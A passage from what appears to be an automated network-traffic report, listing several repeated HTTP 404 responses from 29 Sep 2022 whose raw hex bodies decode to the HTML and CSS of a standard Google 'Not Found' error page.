69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:23 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:23 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:24 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:24 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:24 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 